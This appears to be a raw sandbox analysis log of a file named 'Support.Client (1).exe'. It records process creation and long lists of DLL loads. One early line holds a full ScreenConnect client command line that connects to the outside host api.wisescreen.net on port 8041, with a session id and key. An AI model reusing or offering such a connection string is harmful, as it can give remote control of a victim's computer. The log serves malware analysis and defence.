Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "a26a4531-970e-49ee-adc5-025b684e5b57" "User"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "a729bf7b-fc8b-4b7f-a944-3b6cfbd7ef10" "System"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6884 -ip 6884
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 320
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
